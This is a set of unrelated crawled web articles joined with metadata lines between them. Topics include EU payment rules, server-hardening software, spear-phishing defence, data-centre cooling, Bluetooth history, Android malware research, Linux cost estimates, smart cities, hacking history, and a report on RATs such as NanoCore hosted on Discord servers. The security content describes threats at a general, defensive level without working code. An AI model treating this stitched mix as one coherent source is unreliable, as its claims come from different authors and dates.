Mobile payment applications (or m-payment applications) are subject to the Payment Services Directive (2007/64/EC), which regulates payment services and payment service providers in the European Union and European Economic Area. The Directive was adopted to harmonize consumer protection and to set out the rights and obligations of payment providers and users, like transparency of information (including any charges, exchange rates, transaction references and maximum execution time). However, some issues remained unaddressed. The Directive doesn’t apply to transactions to or from third countries. Furthermore, new means of payment, such as mobile banking, are often still fragmented along national borders, making it difficult for innovative payment services to provide consumers with effective, convenient and secure payment methods. Addressing the need for harmonization, the European Commission proposed a revision that focused on electronic payments. The European Parliament adopted the proposal in 2015. One of the new rules imposes strict security requirements for the initiation and processing of electronic payments and the protection of consumers’ financial data. Following the Parliament's vote, the Directive will be formally adopted by the EU Council of Ministers in the near future.
In conclusion, the European Union has addressed the protection of consumer data in many ways. However, the introduction of new techniques such as mobile applications has urged legislators to adjust the current regulations. 2016 will be an interesting year in this respect, since many of these amendments will be formally adopted.
Information security standards such as PCI DSS and ISO 27001 and regulations such as HIPAA and CMMC mandate system hardening as one of the most basic defenses against cyber intrusions.
The reason for this should be obvious to anyone: What’s the point of implementing more advanced security measures and protections if you don’t first bolt all the unnecessary “doors” through which attackers can enter your systems and networks?
What is system hardening and what are the associated challenges?
System hardening is the process of configuring IT infrastructure – servers, databases, networks, operating systems, and applications – to minimize the organization’s attack surface, i.e., the vectors and vulnerabilities cyber attackers may exploit to gain access to and control over it.
Increased security is one of its goals, but there are others: regulatory compliance, long-term cost savings, and enhanced operational stability.
What does system hardening encompass? Let’s take server hardening as an example. According to the NIST SP 800-123 Guide to General Server Security, server hardening should include:
- Configuring the underlying OS and user authentication (e.g., disabling unneeded default accounts, creating only necessary accounts, creating specific user groups with specific rights, etc.)
- Removing or disabling unnecessary services, applications, and network protocols (e.g., file and printer sharing services, system and network management tools, ports, etc.)
- Configuring appropriate access controls to resources (limit read and write access, limit execution of system-related tools to sysadmins, etc.).
Sounds simple, no? But what if you must do it all for several hundred or thousand different servers? And, most importantly, can you prevent these configurations and modifications from being inappropriately altered as time passes?
Roy Ludmir, business development manager at Israeli company CalCom, says that there are two categories of tools that can be used for server hardening (though that’s not their main purpose): compliance scanners and configuration management tools.
But while the former focus on pointing out configuration drift from specific compliance frameworks, and the latter can do that as well as enforce hardening policies and configuration changes, neither provides a solution for the entire hardening process the way their CalCom Hardening Suite does.
“None of them replace the need for lab testing to simulate the impact of security policies on servers before they are enforced, and none of them help reduce the complexity of change management and enforcement of multiple policies on a complex infrastructure,” he says.
In addition to that, the suite allows IT operations and IT security teams to make server hardening a continuous process rather than a one-time task, as well as to maintain their organization’s compliance posture over time, despite updated policies and changes introduced in the infrastructure.
Server hardening minimizes the risk of infrastructure downtime
Organizations that juggle more than a couple of hundred servers with a multitude of configuration options and must deal with a constantly changing infrastructure can’t hope to perform constant and thorough server hardening manually.
Just think about it:
- A hardening project must start with an analysis of the impact hardening policies will have on the production infrastructure before any configuration changes are made (Never test hardening on production servers!)
- Different hardening policies must be implemented for different systems (and mistakes avoided or easily rolled back)
- Constant policy and infrastructure updates might affect the compliance posture, meaning compliance-focused scanning should be near-constant.
Of these, the step that’s most difficult to perform quickly and accurately is the impact analysis.
To see how your hardening policies will affect your production environment, you need to build a test environment that will accurately reflect its complexity, as well as simulate the traffic, the number of users in the network, and various dependencies. This is a grueling task to perform manually, and there’s a high chance of error that could lead to costly production downtime.
CalCom Hardening Suite minimizes this risk thanks to its automated processes. After its software agents are installed on the servers, it starts the so-called learning mode, during which it collects data from different sources on the machines and analyzes it to understand how the proposed policies will impact system operations.
The resulting report lists each proposed policy, its desired value, and its current value. If these values match, it means that no changes will happen when the policy is enforced. If they don’t, the solution differentiates between values that will be changed when enforcing the policy with no impact on server operation, and values that, if changed, will lead to production server disruption.
Based on this analysis, the solution creates the optimal policy implementation plan for each server that will maximize policy compliance while avoiding impact to production.
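The desired-versus-current classification at the heart of such a report can be sketched as follows. The policy names and values below are invented for illustration; CalCom's actual policy schema is not public:

```python
# Hypothetical sketch of the desired-vs-current classification described
# above. Policy names and values are invented for illustration; this is
# not CalCom's actual data model.

desired = {
    "SMBv1": "disabled",
    "MinPasswordLength": 14,
    "TelnetService": "disabled",
}
current = {
    "SMBv1": "enabled",       # drift: enforcement would change the server
    "MinPasswordLength": 14,  # already compliant: enforcement changes nothing
    "TelnetService": "enabled",
}

def classify(desired, current):
    """Split policies into those already met and those that would change."""
    compliant = [name for name, value in desired.items()
                 if current.get(name) == value]
    drifted = [name for name, value in desired.items()
               if current.get(name) != value]
    return compliant, drifted

compliant, drifted = classify(desired, current)
print("No change when enforced:", compliant)    # ['MinPasswordLength']
print("Will change on enforcement:", drifted)   # ['SMBv1', 'TelnetService']
```

A real implementation would additionally have to decide, for each drifted policy, whether the change is safe or would disrupt production, which is the part that requires the impact analysis described above.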
The next step – policy enforcement/implementation – is often performed by organizations via configuration management tools and Group Policy Objects (GPOs). If the policies are maximally granular – as they should be to suitably harden the different environments, machine types and roles – this can also be a time-consuming nightmare for IT operations teams that don’t have an automated solution at their disposal.
CHS, on the other hand, can push configuration changes on the entire production server fleet from a single point of control. This enables organizations to assign the privileges needed to change system configurations only to a minimal number of users, thus minimizing human error.
Finally, CHS prevents configuration changes that violate the enforced policies – whether they are performed by malicious actors or are the result of a simple error. It also notifies the security team about the attempted configuration change by sending alerts to the SIEM or SOC solutions in use.
CalCom Hardening Suite is available for servers, middleware applications and endpoints.
Keren Pollack, CalCom’s marketing manager, says that their clients are mostly insurance companies, financial institutions, healthcare companies, and DoD contractors – companies that must comply with regulations that require system hardening. Companies that support critical infrastructure are also prospective clients.
Customers can use the solution with minimal support from CalCom, but the company also offers additional guidance and advice to customers, if needed.
“We have the in-house knowledge to help organizations build effective system hardening policies. They are usually based on our own hardening recommendations, special organizational needs, and industry best practices and benchmarks (e.g., CIS, NIST, DISA STIGs, and so on),” Pollack explained.
“After the initial policies are defined, the organization needs to have another policy discussion after CHS’s learning process is done, to decide what they are going to do about each hardening action they can’t implement without adversely affecting production. We can be involved in this process and help them choose the right course of action.” | <urn:uuid:ef4931fb-927c-4a51-a679-587212f788f6> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2021/11/15/server-hardening-automation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00566.warc.gz | en | 0.926531 | 1,429 | 2.65625 | 3 |
What do you think is the greatest threat to your company’s cybersecurity? Would you say weak passwords? Unsecured WiFi? Unsafe usage of IoT devices? Those are some pretty good guesses, but the top security threat to your company’s system is you.
Email “phishing” attacks are still among the top cybersecurity threats to companies of all sizes. You’re probably saying, “I’m not clicking on anything that isn’t sent directly to me,” but that wisdom is still no defense against one of the most prevalent cybersecurity schemes: spear phishing.
“How is spear phishing different from regular phishing?”
The difference between a typical phishing scheme and a spear-phishing scheme is the precision of the attack.
Much like a fisherman drops a baited line, waiting for any fish that happens to be swimming by to take the bait, classic phishing occurs when an attacker sends out many emails containing malicious software links to a group — whether it’s a certain company or the contact list of their latest victim. When the victim interacts with the email, their system typically becomes infected if preventative measures are not taken. While scary, many people would recognize an old-fashioned phishing email if it landed in their inbox. In fact, most of the dead giveaways of a phishing email would typically be caught by your email client.
Spear Phishing Definition
As the name implies, spear phishing is a style of cyber-attack where the attacker targets a specific individual victim instead of whoever happens to take the bait. A nautical spear fisherman doesn’t just fill the sea with spears, hoping to hit a fish. They take their time, looking to find a fish worth pursuing. They know where the fish can be found and how they behave. Much like the actual nautical spear fisherman, an online spear phishing attacker has a good amount of knowledge about their specific target.
Spear phishing has become increasingly easier for attackers due to the wealth of information available about the average person online. From social media accounts to company website profiles and more, a spear phisher is armed with enough knowledge to attack victims through familiarity.
Spear phishers use details about the victim’s life that the victim assumed only friends, family, co-workers, personal banks, healthcare providers or even government agencies would know about them. When targets let their guard down, that’s when the threat is able to get their victim to divulge information or allow access to a malicious stranger they assume is legitimate.
“How do I protect myself against a spear-phishing attack?”
It's easy to feel helpless against spear phishing in this day and age. Who are we to trust? Here are some quick tips to help protect you against a spear-phishing attempt.
Even if an email sender looks familiar, double-check the address.
A favorite spear-phishing technique is to mask the true sender’s email address to avoid suspicion. Certain emails requesting you engage with links or submit sensitive information may be phishing schemes from familiar-looking email addresses. Double-check to make sure that an email address truly belongs to the person they claim to be. When in doubt, simply call the phone number you already have on file for them or through the organization's official website. Never use the phone number provided by a suspected spear phisher.
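Part of this check can be automated. The sketch below uses Python's standard `email.utils.parseaddr` to pull the real address out of a From header and compares its domain against a list you trust; the domains are hypothetical, and this only catches crude spoofing — look-alike domains and compromised legitimate accounts still require the manual verification described above.

```python
# Illustrative check: does the actual From address belong to a domain we
# already trust? Domains here are hypothetical, and this only catches
# crude spoofing; look-alike domains still require human judgment.
from email.utils import parseaddr

TRUSTED_DOMAINS = {"mybank.example", "payroll.example"}

def sender_domain_trusted(from_header: str) -> bool:
    """True if the real address in a From header uses a trusted domain."""
    _display_name, address = parseaddr(from_header)
    domain = address.rpartition("@")[2].lower()
    return domain in TRUSTED_DOMAINS

print(sender_domain_trusted("Support <help@mybank.example>"))                # True
print(sender_domain_trusted("MyBank Support <help@mybank-secure.example>"))  # False
```

Note how the second example fails even though the display name looks legitimate: the lookalike domain `mybank-secure.example` is exactly the kind of mismatch spear phishers rely on you not noticing.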
Don’t send confidential information over email.
Most companies, banks, healthcare providers, or government agencies will never request that you submit sensitive data via email. Even if there is a link provided to visit a website to submit such requested information, remain skeptical. Hover over any links before clicking on them to make sure they are hyperlinked to a website address you know to be correct. Again, when in doubt, call ahead.
When in doubt, double-check on your end.
If you receive a request from a familiar bank, government agency, or other organization requesting you to take any action that may put sensitive data at risk (for example, a request for you to update your password), do not initially engage with the email. Instead, reach out to the organization through the contact details you know to be correct (a phone number on your bank card or health insurance card, etc.) to verify that this request came from them.
Watch what you post online.
This is as good a time as ever to reassess not only your behavior on social media but also your security settings. Limit posting personal details that can be used by spear phishers in later attacks. Thoroughly examine the privacy settings of your social media accounts. There’s a good chance that more information about you is available for anyone to acquire than you thought. Periodically search for yourself online to see what is available.
Always assume you’re being phished.
Until an email sender can successfully prove that they are who they claim to be, the safest thing you can do is simply assume that every request for sensitive information is a phishing scheme. Being proactive and vigilant against cybersecurity threats greatly decreases your chances of falling victim. | <urn:uuid:38989d5d-7433-4aea-8391-bb90aac7b37f> | CC-MAIN-2022-40 | https://www.jdyoung.com/resource-center/posts/view/182/what-is-spear-phishing-jd-young | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00566.warc.gz | en | 0.936448 | 1,074 | 2.65625 | 3 |
An innovative University of Hull cooling system has helped Hull City Council reduce electricity consumption at its data center by up to 80 per cent.
Using a super-performance Dew Point Cooling system, developed at the University’s Centre for Sustainable Energy Technologies, Hull City Council have made huge savings in electricity cooling costs and reduced their carbon footprint.
The technology was first tested at the University’s Aura Innovation Centre in Hessle before the trial was extended to Hull City Council’s data center.
Dr Zishang Zhu, a senior research fellow at the University of Hull, said: “This project is the culmination of 15 years of work at the University, developing the technology to a point where we could demonstrate its potential at our own Aura Innovation Centre.
“After the success of that pilot project, the next step was applying the same technology to Hull City Council’s data center. The savings, both in carbon emissions and cost, have been impressive.
“We have now been able to demonstrate, in a real-world environment, the potential this cooling technology can have. It offers enormous benefits to companies, both from an environmental and financial point of view.”
The Dew Point Cooling technology can lead to an 80-90 per cent reduction in electricity consumption and carbon emissions compared to traditional cooling systems.
For the project, two 4kW dew point coolers were installed at the Aura Innovation Centre, to service its computer room.
The second pilot – at Hull City Council’s data center – saw the installation of a 100kW cooling system.
The technology will save the council £149 per day in its electricity cooling costs which is equivalent to £54,000 per year. | <urn:uuid:5b7eb5d0-1d54-485e-89e3-cca14f1a0b40> | CC-MAIN-2022-40 | https://digitalinfranetwork.com/news/hull-city-council-data-center-reduces-electricity-consumption-and-cuts-co2-emissions-with-university-of-hull-cooling-technology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00566.warc.gz | en | 0.949293 | 352 | 2.59375 | 3 |
Bluetooth is a wireless technology that links devices over short distances using short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz. We use it to connect wireless mice and headsets and sometimes to sync data across devices like phones or computer or stereos.
Bluetooth technology was initiated in 1989 in Sweden by a team working for Ericsson and finally released in 1997 after the industry standards were established by a consortium of companies including Intel and Ericsson. It was originally going to be called Business-RF or MC-Link… but after two of the top engineers from Intel and Ericsson went out for a night of drinking and started talking about history, it was dubbed Bluetooth.
Harald Bluetooth was a medieval king who united Denmark and Christianized the Danes a thousand years ago. The point of this technology is to unite devices, and that’s what ole King Bluetooth did, so… meh, why not?
The symbol of the technology is a bind rune combining Harald Bluetooth’s two runic initials, H and B.
…pretty cool, huh? …bet you didn’t know that!
Here at Frankenstein we know a lot more than just useless trivia like this. If you’re having problems with your devices (Bluetooth or otherwise), give us a call or stop by; we’re happy to help!
Frankenstein Computers has been taking care of our happy clients since 1999. We specialize in IT Support, IT Service, MAC repair, PC Repair, Virus Removal, and much more. | <urn:uuid:865493ad-015d-4868-9235-5be05d0c4b27> | CC-MAIN-2022-40 | https://www.fcnaustin.com/bluetooth-1000-years-old/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00566.warc.gz | en | 0.949274 | 319 | 2.828125 | 3 |
You may have noticed the increase in the number of smartphone threats, malware and viruses being reported as of late. It hasn’t gone unnoticed by researchers either, as Tom’s Guide recently described what it calls “the Center for Disease Control, only for Android malware.” North Carolina State researchers launched the Android Malware Genome Project to look at the evolution and characteristics of malware on Android to better understand future generations and better protect devices.
“The popularity and adoption of smartphones has greatly stimulated the spread of mobile malware, especially on the popular platforms such as Android,” the Android Malware Genome Project’s website said. “In light of their rapid growth, there is a pressing need to develop effective solutions. However, our defense capability is largely constrained by the limited understanding of these emerging mobile malware and the lack of timely access to related samples.”
Xuxian Jiang, the leader of the project, told Tom’s Guide that as users of Android have found, there’s a lot of malware samples out there in the wild and not really too much understanding of what makes any of it tick. This is important, as antivirus programs and other systems that look to protect phones need to know how to attack the virus or other exploit.
“Basically, at this stage, we want to open up first our current collection of Android malware samples and make them available to research community,” Jiang told the news source. “The purpose is to engage the research community to better our understanding of mobile threats and develop effective solutions against them.”
NC State has collected 1,200 Android samples which will be shared with Genome Project participants. They will look to see what they can do with these viruses before showing the public their findings and research. The news source said Jiang told the IEEE Symposium on Security and Privacy in San Francisco earlier this month that defense of Android devices is limited due to the lack of understanding, so the researchers want to have a hand in developing next-generation mobile security solutions to help protect individual users and businesses.
For all you Android users out there, what approach do you take regarding security? Do you have any kind of security solution or application control to help keep malware and other threats off your device? Let us know in the comments! | <urn:uuid:9011e1bb-a73c-4241-86d5-411afb62bf9f> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/anatomy-of-android-malware | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00566.warc.gz | en | 0.940334 | 474 | 3.015625 | 3 |
The Linux Foundation has updated David Wheeler's 2001 study, which estimates the approximate cost of developing a typical Linux distribution using a methodology based on the total number of software lines of code (SLOC) present in the distribution.
The tool the Linux Foundation used, SLOCCount, calculated back then that the cost of developing Red Hat Linux 7.1 would be around USD 1.2 billion, based on the 30 million physical source lines of code in the operating system.
Applying the same tool to the Fedora 9 distribution shows that the cost of building a Linux distribution has increased roughly ninefold, reaching USD 10.8 billion, with the Linux kernel alone accounting for a staggering USD 1.4 billion.
The authors of the study estimated that it would take 59,389 person-years of coding to churn out 204.5 million lines of code, and used an average cost per coder of USD 75,662, adding a further 140 percent overhead to cover benefits and other charges.
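The headline figure follows directly from those inputs. The sketch below reproduces it, and also shows the Basic COCOMO organic-mode effort formula that SLOCCount builds on (SLOCCount applies that formula per component and sums the results, so feeding all 204.5 million lines into it at once would not reproduce the 59,389 person-year figure):

```python
# Reproduce the article's headline figure from its own inputs, and show
# the Basic COCOMO (organic mode) effort formula that SLOCCount builds on.

person_years = 59_389   # estimated effort for 204.5M SLOC (from the report)
base_salary = 75_662    # average annual cost per developer, USD
overhead = 1.40         # 140% overhead for benefits and other charges

loaded_salary = base_salary * (1 + overhead)  # ~181,589 USD per person-year
total_cost = person_years * loaded_salary

print(f"Loaded cost per person-year: ${loaded_salary:,.0f}")
print(f"Estimated development cost:  ${total_cost / 1e9:.1f} billion")  # -> 10.8 billion

def basic_cocomo_effort_pm(ksloc: float) -> float:
    """Basic COCOMO, organic mode: effort in person-months.

    SLOCCount applies this per component and sums the results rather than
    applying it to the whole codebase in one go.
    """
    return 2.4 * ksloc ** 1.05
```

Multiplying the effort figure by the fully loaded salary gives roughly USD 10.8 billion, matching the report.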
Overall, the Linux operating system represents a USD 25 billion ecosystem according to the same report.
The foundation also found out that more than 1000 developers from more than 100 companies - including quite a few Fortune 500 companies - contribute regularly to the Linux Kernel.
SLOCCount uses an industry standard called the COnstructive COst MOdel (COCOMO), an algorithmic software cost estimation model developed by Barry Boehm.
To put that in perspective, Windows Operating System probably cost the world several hundreds of billions of dollars in terms of sales and development time over two decades.
The whole report was compiled by Amanda McPherson, Brian Proffitt and Ron Hale-Evans.
Network Infrastructure Security, typically applied to enterprise IT environments, is a process of protecting the underlying networking infrastructure by installing preventative measures to deny unauthorized access, modification, deletion, and theft of resources and data.
How can an information system infrastructure be made secure?
Access to all equipment, wireless networks and sensitive data should be guarded with unique user names and passwords keyed to specific individuals. If you create a master document containing all user passcodes, be sure to encrypt it with its own passcode and store it in a secure place.
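For example, generating a strong, unique passcode for each account can be done with Python's standard `secrets` module (a cryptographically secure random source); the 16-character length and character set below are illustrative choices, not a mandated standard:

```python
# Sketch: generate a strong, unique passcode per account using the
# standard library's CSPRNG. Length and character set are illustrative.
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def generate_passcode(length: int = 16) -> str:
    """Return a random passcode drawn from a cryptographically secure source."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(generate_passcode())  # random each run
```

Using `secrets` rather than `random` matters here: the latter is predictable and unsuitable for anything security-related.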
What do u mean by infrastructure security?
Infrastructure security is the security provided to protect infrastructure, especially critical infrastructure, such as airports, highways rail transport, hospitals, bridges, transport hubs, network communications, media, the electricity grid, dams, power plants, seaports, oil refineries, and water systems.
WHY IT infrastructure security is important?
IT infrastructure security is essential in protecting companies against online threats. … Infrastructure security tools and methods can help businesses mitigate the risk of falling victim to data theft and sabotage of the IT infrastructure.
What is the infrastructure for an IT security policy?
The infrastructure will be designed to ensure the confidentiality, integrity, and availability (CIA) of information. In particular, the protection of systems and information against unauthorized access, against unauthorized modification or disclosure, and protection of systems against denial of service.
What is the relationship between infrastructure and security?
Consolidated visibility across multiple networks and even entire facilities can help security teams quickly identify and contain any threat that might move laterally across the infrastructure. This can also help security and IT teams develop a more proactive approach to security.
What makes a system secure?
A system is said to be secure if its resources are used and accessed as intended under all circumstances; however, no system can guarantee absolute security against the various malicious threats and unauthorized access it faces.
What are the 3 types of infrastructure security?
Access Control: The prevention of unauthorized users and devices from accessing the network. Application Security: Security measures placed on hardware and software to lock down potential vulnerabilities. Firewalls: Gatekeeping devices that can allow or prevent specific traffic from entering or leaving the network.
Which is an example of infrastructure?
The term infrastructure refers to the basic physical systems of a business, region, or nation. … Examples of infrastructure include transportation systems, communication networks, sewage, water, and electric systems.
Does infrastructure include security?
A physical security systems infrastructure is a network of electronic security systems and devices that is configured, operated, maintained and enhanced to provide security functions and services (such as operational and emergency communications and notification, intrusion detection, physical access control, video …
What are the 5 areas of infrastructure security?
- Chemical Sector.
- Commercial Facilities Sector.
- Communications Sector.
- Critical Manufacturing Sector.
- Dams Sector.
- Defense Industrial Base Sector.
- Emergency Services Sector.
- Energy Sector.
What are the 7 domains of IT infrastructure?
Seven domains can be found in a typical IT infrastructure. They are as follows: User Domain, Workstation Domain, LAN Domain, LAN-to-WAN Domain, Remote Access Domain, WAN Domain, and System/Application Domain.
Why is infrastructure security important to organizations and governments?
Together, public-private efforts to strengthen critical infrastructure help the public sector to enhance security and rapidly respond to, and recover from, all-hazards events and help the private sector restore business operations and minimize losses in the face of such an event.
What are the three types of security policies?
Security policy types can be divided into three types based on the scope and purpose of the policy:
- Organizational. These policies are a master blueprint of the entire organization’s security program.
- System-specific. …
What is ICT security policy?
Policy Statement. This policy seeks to protect the confidently, integrity, and availability of information and ICT Facilities through the use of established IT security processes and practices. It should be read in conjunction with the ICT Acceptable Use Policy. Scope.
What should be included in IT security policy?
Information security objectives
Confidentiality—only individuals with authorization should access data and information assets. Integrity—data should be intact, accurate and complete, and IT systems must be kept operational. Availability—users should be able to access information or systems when needed.
Solid state hard drives are the hottest thing in data storage today.
A smaller footprint plus faster response time and lower power consumption are hallmarks of solid-state storage that employs cutting-edge NAND flash technology.
With an SSD, an array of memory chips work together as a disk drive volume. Instead of using traditional magnetic media like conventional hard drives, SSDs use integrated circuits (ICs) as the storage media.
Over the past few years, there’s been an explosion of new products using this silicon-based storage technology. Smartphones, digital camera media, and tablet computers all utilize some type of flash memory system.
The best thing about this new technology is that it uses no moving parts, making mechanical failure a thing of the past. The only negatives of SSDs are high prices and low storage capacities, both of which will change for the better over time.
Although SSDs have no moving parts, they are still susceptible to failure. Regular backups are always advisable whether your data lives on a conventional hard drive or a solid-state storage device. If you suffer an SSD failure and don’t have an adequate backup, DriveSavers can help get your data back. We have the most advanced techniques and capabilities plus the highest level of success in the industry.
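A basic backup can be as simple as a copy plus a digest check. The sketch below (the function name and approach are ours, for illustration) copies a file and then verifies the copy byte-for-byte via SHA-256, so silent corruption on either drive is caught at backup time.

```python
import hashlib
import shutil
from pathlib import Path

def backup_with_verify(src: str, dst: str) -> str:
    """Copy src to dst, then confirm the two digests match.

    Returns the SHA-256 digest on success, raises IOError on mismatch.
    """
    shutil.copyfile(src, dst)
    src_digest = hashlib.sha256(Path(src).read_bytes()).hexdigest()
    dst_digest = hashlib.sha256(Path(dst).read_bytes()).hexdigest()
    if src_digest != dst_digest:
        raise IOError("backup verification failed: digests differ")
    return src_digest

# Example: backup_with_verify("photos.zip", "/mnt/backup/photos.zip")
```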
June 24, 2020
Dr. Jonathan Reichental, former CIO of the City of Palo Alto and the Founder and CEO of Human Future, explores what is at the heart of the future of all cities.
To succeed at elevating the human condition for billions of people, cities need to adopt new ideas, new approaches, and new technologies for how they’re operated and delivered. That’s the definition of a smart city.
The smart city is about people; it’s about improving the quality of life for urban communities all over the world.
When developing a smart city, the focus isn’t just on exploring technology, although technology does play a large role. Neither do cities need to create a surveillance society or erode privacy in order to succeed. At their core, smart cities aren’t about sensors or algorithms or virtual town halls — they’re about a better future for humanity. After all, to quote Shakespeare, “What is the city but the people?”
Earth is already a majority urban planet and it’s estimated that, by midcentury, 70 percent of all humans will live in an urban area. Put another way, our human future belongs to cities. Most people will spend their days living, working, and playing in a metropolis. If we want to enjoy career opportunities, clean air and water, efficient transportation, low-cost energy, safety, convenient city services, and inclusion while all the time saving the planet from a climate crisis, we have a lot of city work ahead of us.
The city is already the center of the human experience. It is the most complicated and successful of all inventions. Urban areas have lifted billions of people out of extreme poverty, and they continue to shape and define our future. The challenges ahead for cities aren’t trivial. Cities have come a long way, but they have a long way to go. Building better and smarter cities may be the biggest challenge that humanity now faces.
I wrote Smart Cities For Dummies as the definitive reference guide for anyone who has an interest in creating safer and more prosperous communities. It’s also for anyone who wants to understand the opportunities and challenges in the world’s cities. When I discovered that cities would be central to our human future, I was compelled to become a part of positive change. I’ve spent several years helping to build smarter communities and educate city leaders on almost every continent. The realization that done right, cities were capable of offering the best solutions for a better tomorrow was the moment my passion for cities emerged. This book is my attempt to share the city planning-and-development lessons and ideas I’ve discovered and executed along the way.
Smart Cities For Dummies is the first comprehensive reference and how-to book that gives you the knowledge and tools to build smarter cities and improve the quality of life for the greatest number of people. The book is available for preorder around the world at your favorite bookstore or online bookseller. It is also available in many territories on Amazon: http://www.smartcitybook.com | <urn:uuid:885359db-477d-4f3c-8fec-2c704f33fbbd> | CC-MAIN-2022-40 | https://internetofbusiness.com/what-defines-smart-city/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00566.warc.gz | en | 0.941894 | 708 | 2.875 | 3 |
While our team is now extremely well-versed and full of experts in the field of cybersecurity, there once was a time where hacking was a new concept to, well…everyone! Before the knowledge that allows us to deliver a superior threat defense using industry-leading security partners and technologies was available, we too were learning all about the ins and outs of hacking.
When did it begin? Who was the first to try it? Join us for a brief journey through the history of hacking that, by default, helped Kobargo become who we are!
How Hacking Started
We’ve all come to know “hacker” as a descriptor for someone who (ordinarily) maliciously engages in cybercriminal activity. Typically, they gain access to platforms, servers, information, and more through what is, essentially, digital breaking and entering. However, the modern use of the word in relation to computers and technology is a fairly new introduction.
According to The New Yorker, a meeting at M.I.T. in 1955 is to be thanked for it.
In minutes detailing a meeting of The Tech Model Railroad Club, one line reads: “Mr. Eccles requests that anyone working or hacking on the electrical system turn the power off to avoid fuse blowing.” In an article by Tripwire, this was in reference to members in the club “hacking” high-tech train sets to improve their functions and make customizations. Eventually, those individuals moved from trains to computers and joined an early group of tech-users that played with hacking abilities and created some of the programs we all use today.
By the 1960s, the term “hack” was widely being used by the budding computer industry and in 1975 a glossary for computer programmers, called The Jargon File, was launched that gave us a more well-known definition. It defined hacker in multiple ways, one being: “[deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence password hacker, network hacker. The correct term for this sense is cracker.”
In the 1970s, we saw hacker John Draper become an infamous household name due to “phreaking”, or phone hacking. In fact, according to Esquire, Steve Wozniak and Steve Jobs were phone phreakers before creating Apple, further proving that hacking during the time period was booming. As the 1980s arrived, the general population was beginning to fill their homes with personal computers and hacking was now possible for anyone who owned one, not just businesses or wealthy enough entities.
M.I.T. can also be credited with the balloon hack at the annual Harvard-Yale game on November 30, 1982. According to CyberSecurityMastersDegree.org, a black balloon inflated along the sideline stopped the game, and on it was a set of letters that read “MIT”. The balloon popped, and the football game was officially “hacked”. With an influx of ever more advanced tactics, 1986 brought about the first legislation dealing with hacking, the federal Computer Fraud and Abuse Act.
While the goal of hacking hasn’t changed much in 40 years, the approach and severity of attacks undeniably have. Not to mention, cybercriminals are far more bold, brazen, and unbothered. Unlike the early years of hacking, the 2000s and beyond have shown us that even the biggest, most secure companies are at risk. Take famous 21st-century breaches such as those at Yahoo, Equifax, Target, Uber, and Sony PlayStation, to name just a few.
In 2020 we’re seeing hackers evolve beyond our wildest, earliest imaginations in terms of hacking abilities. We’ve even witnessed hacking become popular in its own right with small events like local hackathon seminars and entire careers based on ethical hacking. Plus, movies such as Snowden, Eagle Eye, and Die Hard have helped the topic become slightly mainstream. Basically, hacking can absolutely be detrimental, but it can also be an extremely useful tool. We’re far from the beginning and nowhere near the end with hacking, but we certainly are ready to take it on.
How We Can Help
We have nearly 50 years of experience working in technology at Kobargo, and a drive to deliver the service you expect. We understand that the one-size-fits-all model doesn’t apply to every business; each company has unique needs, challenges, and budgets. We can help you gain a clear understanding of your environment and ultimate goals and can create a plan that meets your needs. Contact us today to see how we can help you and your organization.
Discord, a free VoIP service designed for gaming communities, has had its chat servers abused to host malware. Most of the malicious samples found distributed on the app were remote access Trojans (RATs), such as NanoCore (Trojan.Nancrat), njRAT (Backdoor.Ratenjay), and SpyRat (W32.Spyrat), among others.
How is Discord used?
Since it was released in March 2015, Discord's popularity has increased especially among gamers, given that it is free, simple, multiplatform, and innovative. As of July 2016, more than 11 million people have used it.
Any Discord user can create a server, or group, in less than 10 seconds. Most of the groups on Discord are gamer gatherings (teams, guilds, clans) that use the VoIP service to communicate (via chat or voice) whether gaming or not.
Other groups focusing on a broader audience have also surfaced on Discord. For example, IT security researchers have created servers on Discord. In some cases, users have set a never-expiring invite link to their groups and advertised it on third-party websites. These are usually marketed as places where knowledge is being shared and exchanged on particular topics. Some of these groups have thousands of members—most are gaming-related, while others are tech- and anime-related.
However, hacking groups have also set up Discord servers and are actively inviting people to join. Even shadier groups have created Discord servers that serve as a black market for the sale of malware or stolen data.
How do attackers distribute malware on Discord?
Using its chat feature, Discord’s users can post messages and links, embed pictures and videos, and upload attachments. Most gamers’ teams and guilds also use some chat channels as documentation boards.
Since the chat app allows members to upload most types of files, attackers can create a server and post or upload malicious attachments to the chat, then use the server as a download site in a second-stage attack. Other attackers don’t have to create a server of their own—they could simply post malware manually to a server they had been invited to, baiting other unwitting users into opening the threat.
Besides the infamous and accessible RATs, such as NanoCore, njRAT, and SpyRAT, we also found various infostealers, Trojan Horse malware samples, and downloaders among the files we’ve seen hosted on Discord. These may have been part of a drive-by download strategy or social-engineering campaign.
Figure. A NanoCore sample observed on a Discord chat channel server.
In our observation, NanoCore was the most prevalent among the malware hosted on Discord's chat servers. This RAT has been around since at least 2013, with a few versions leaked early last year, and NanoCore RAT activity has not ceased since then. The RAT mainly affects computers in the US, followed by Japan and Germany.
Who are the targets?
Since the service was designed specifically for gamers, the majority of targets are from the gaming community. The app attracts a large number of video-streamers, as it includes a streamer mode that lets users hide sensitive information while streaming content such as gaming sessions.
The attackers behind the RATs and other malware may have distributed their threats on the service to steal sensitive information related to online gaming (credentials, items, in-game currency, and contacts) directly from the victim’s computer. This data can be valuable to attackers just as much as other personally identifiable information (PII), such as users' bank account details, web service credentials, contact numbers, IP addresses, and biometric information. These could all be harvested by data thieves in the process.
